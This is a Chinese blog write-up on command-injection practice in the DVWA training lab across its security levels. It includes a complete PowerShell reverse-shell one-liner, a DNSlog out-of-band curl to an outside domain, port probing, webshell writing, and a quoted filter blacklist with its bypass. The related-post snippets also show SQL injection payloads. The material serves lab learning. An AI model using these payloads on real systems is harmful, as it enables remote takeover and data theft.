PHP靶场练习(一)dvwa靶场命令执行

原创 于 2026-03-03 16:46:52 发布 · 401 阅读 · 6 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#php #开发语言 #安全

低安全级别

利用方式一:利用过滤不严格问题,拼接shell命令执行

理论拼接符号:
在这里插入图片描述
已win10环境实测:&&最好用
在这里插入图片描述

利用方式二:延时盲注,无回显场景使用

在这里插入图片描述

利用方式三:写入shell

结合具体系统进行转义
在这里插入图片描述
成功写入shell
在这里插入图片描述

利用方式四:反弹 Shell (Reverse Shell)

127.0.0.1 && powershell -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.58.1',8888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

在这里插入图片描述
另一设备使用nc接受反弹流量
在这里插入图片描述

利用方式五:DNSlog带外

127.0.0.1 && curl http://95d43ab3ae.ddns.1433.eu.org

在这里插入图片描述

利用方式六:端口探测

127.0.0.1 && curl http://127.0.0.1:80

在这里插入图片描述
在这里插入图片描述

中安全级别

利用方式一:源码过滤&&,使用&拼接命令或代码,使用 | 拼接命令

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

利用方式二:延时注入依旧可用,修改拼接符即可

在这里插入图片描述

利用方式三:写入shell依旧可用,修改拼接符即可

在这里插入图片描述

利用方式四:反弹 Shell (Reverse Shell),因对;进行过滤,可使用编码方式绕过

在这里插入图片描述
在这里插入图片描述

利用方式五:DNSlog带外依旧可用,修改拼接符即可

在这里插入图片描述
在这里插入图片描述

利用方式六:端口探测依旧可用,修改拼接符即可

在这里插入图片描述
在这里插入图片描述

高安全级别

黑名单范围进一步扩大

$substitutions = array(
		'||' => '',
		'&'  => '',
		';'  => '',
		'| ' => '',
		'-'  => '',
		'$'  => '',
		'('  => '',
		')'  => '',
		'`'  => '',
	);

由于|过滤时多了一个空格,保留了利用可能,但是由于过滤了$、-等符号,导致无法使用变量,无法使用参数,诸多利用手段无法使用,实际危害有限
在这里插入图片描述

impossible级别

重构验证逻辑,以 . 区分为四部分,每部分验证是否为数字,若均为数字再拼接回IP,这种方式虽然有一些不足之处,如科学计数法染过、超255未限制等等,但无疑都是小问题,无法造成有效威胁。

鸡尾咖啡
关注
DVWA反弹shell实验
命运的旋律的博客
12-13 1550
反弹shell实验 实验环境:metasploitable2;dvwa-linux版 ##操作过程 进入kali的web服务根目录/var/www/html,写入getshell.py的python程序 #leafpad getshell.py import socket,subprocess,os s=socket. socket( socket.AF_INET , socket. SOC...
手工挖洞学习笔记:dvwa命令执行漏洞/载入php反弹shell
AI_Jardon的博客
08-13 1556
命令执行漏洞 工具: (1)靶机:Metasploitable2 (2)nc (3)kali dvwa 代码审计:安全级别为low <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Wi
DVWA靶场练习
农夫果园好好喝的博客
05-18 2460
1 SQL 注入 1.1 SQL注入介绍 SQL injection,即SQL注入,攻击者在 WEB 表单或者页面请求的查询字符串中通过注入恶意的 SQL 命令,从而使数据库执行恶意的 SQL 语句 1.2 漏洞出现的场景 此漏洞通常出现在如下场景: WEB表单提交 域名 1.3 注入思路 1.判断是否存在注入,注入类型是字符型、数字型还是搜索性型。 2.猜解 SQL 查询语句中的字段数。 3.确定显示的字段顺序。 4.获取当前的数据库。 5.获取当前数据库中的表 6.获取表中的字段名。 7.查询数据 gr
DVWA靶场练习(适合新手的详细步骤)
m0_66588420的博客
05-22 2401
5.猜测表名:1' and length((select group_concat(table_name) from information_schema.tables where table_schema='dvwa'))=15-- qwe===>表名总长度为15。4.查询表名:0' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'-- qwe。
dvwa靶场练习
RealIiikun的博客
02-13 958
dvwa个人练习
Kali搭建DVWA——Web靶场
微笑涛声
11-11 1万+
DVWA款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如sql注入,XSS,密码破解等常见漏洞。旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。
搭建DVWA Web渗透测试靶场
看那白熊
01-31 1万+
搭建DVWA Web渗透测试靶场,进行Web安全测试练习
Kali Linux搭建DVWA漏洞靶场(全过程)
weixin_45876883的博客
04-26 1万+
在kali Linux系统中搭建DVWA漏洞靶场环境
DVWA靶场搭建完整流程
期待nila
01-22 7040
DVWA靶场搭建完整流程@[TOC](DVWA靶场搭建完整流程)欢迎来到期待nila博客1、下载phpstudy2、配置phpstudy3、下载DVWA4、 配置DWVA 欢迎来到期待nila博客 本人因为自己搭建DVWA靶场时候遇到不少问题,找了大量资料,最后总结希望能让大家在最短的时间解决关键性问题。 1、下载phpstudy phpstudy支持CentOS、Ubuntu、Debian、Fedora、deepin,Web端管理,QQ群及论坛技术支持;键创建网站、FTP、数据库、SSL;安全管理,计划
使用PHPstudy搭建DVWA靶场
北冥同学的成长记录笔记
04-29 8408
DVWA(Damn Vulnerable Web Application)个用来进行安全脆弱性鉴定的PHP/MySQL Web 应用平台,旨在为网络安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。
docker部署dvwa靶场
yj2094632273的博客
10-14 2316
最近差不多又是网安专业的同学搭建靶场的时候了,(Damn Vulnerable Web Application)是安全入门者们最为熟知的练习靶场,它能够帮助小白对常见的安全问题进行理解,并且随着理解问题的深入自主调整靶场安全级别。DVWA的搭建方式有很多种,对于我们这种技术小白来说,环境搭建是让人又爱又恨啊!在虚拟机里搭建能够保护我们的主机环境被隔离,在我们在进行些危险操作的时候也能让我们的主机免于伤害。当然友情提醒,当你部署好个新功能的时候,定要拍摄快照,拍摄快照,拍摄快照,拍摄快照。
SQL注入(DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
tmzy1的博客
03-19 7558
SQL注入(DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
XAMPP、phpstudy搭建DVWA靶场
m0_59302403的博客
04-06 3038
DVWA-master 是款用于学习和测试 Web 应用程序漏洞的开源软件,DVWA 全称是 "Damn Vulnerable Web Application",意为“可被攻击的 Web 应用程序”。DVWA-master即为本实验要搭建的DVWA靶场。本实验在XAMPP搭建DVWA靶场的过程中给出搭建步骤和报错的解决方法,在phpstudy搭建DVWA靶场的过程中只给出搭建步骤。
靶场搭建】超级详细——DVWA靶场搭建(婴儿级教程)
KKleeeaa的博客
03-04 1万+
首先你得有个,搭建网站的个软件,这里我推荐小皮面板,它的安装方式简单,搭建也很容易,对于新手来说是个比较好的个软件。小皮面板官方网站为,请选择适合你的版本进行安装,我这里给你们演示的是Windows版本的小皮面板。随后点击网站,创建个新网站,也可以直接用现成的,这里演示创建网站教程。点击刚刚创建好的网站的管理,然后打开跟目录,把DWVA文件解压到这里来。有什么疑难杂症请 截图评论下 博主会第时间给你解决哦。他的官方github在这里,中文版的。键启动 WNMP 蓝色表示启动成功。
Windows搭建DVWA靶场
qq_42562304的博客
06-10 2644
DVWA(Damn Vulnerable Web Application)个用来进行安全脆弱性鉴定的PHP/MySQL Web 应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 DVWA 共包含了十个攻击模块,分别是:Brute Force(暴力(破解))、Command Injection(命令行注入)、CSRF(跨站请求伪造)、- File Inclusion(文件包含)、File Upload(文件上传)、Insecure CAP
DVWA靶场环境搭建
热门推荐
Tockm的博客
03-09 3万+
PHPStudy搭建 官网下载8.x安装包(选择和系统对应的版本) 官网:https://www.xp.cn 直接点击就可安装,步骤跳过 安装完成后,打开软件,点击启动 在浏览器地址栏中输入localhost或127.0.0.0,如果出现如下则正常 启动Apache和mysql服务 mysql不能启动的参考这边博客https://blog.csdn.net/m0_55887872/article/details/121956192 二、 DVWA靶机配置 进入官网
渗透入门必备-DVWA靶场搭建教程(极其详细)
最新发布
ping204568238的博客
05-27 2750
DVWA款专为Web安全测试设计的漏洞演练平台,包含OWASP TOP 10漏洞模块(如SQL注入、XSS等),支持四种安全等级(Low到Impossible)。安装步骤:1)通过phpstudy搭建Apache+MySQL环境;2)下载DVWA并配置数据库连接;3)修改配置文件注释环境变量并添加测试reCAPTCHA密钥。默认账号admin/password可登录,安全级别可在security.php调整,中文乱码需修改字符集为gb2312。该平台既适合新手学习基础渗透,也能满足专业人员的高阶挑战需求
DVWA靶场
weixin_43488911的博客
06-10 4866
DVWA靶场介绍
DVWA靶场篇()——命令执行、CSRF、文件包含
02-11 1273
逻辑运算符“&”和“|”的意思&&:代表首先执行命令a在执行命令b,但是前提条件是命令a执行正确才会执行命令b,在a执行失败的情况下不会执行b命令。所以又被称为短路运算符。&:代表首先执行命令a在执行命令b,如果a执行失败,还是会继续执行命令b。也就是说命令b的执行不会受到命令a的干扰,在执行效率上来说“&&”更加高效。||:代表首先执行a命令在执行b命令,如果a命令执行成功,就不会执行b命令,相反,如果a命令执行不成功,就会执行b命令。
DVWA | DVWA —— 靶场搭建指南
Blue17 の 小窝
10-11 3683
DVWA(Damn Vulnerable Web Application)是PHP/MySQL 的 Web 应用程序,它被故意设计成包含多种安全漏洞,以便为网络安全专业人员、开发人员和学生提供个合法和安全的环境来学习 Web 安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值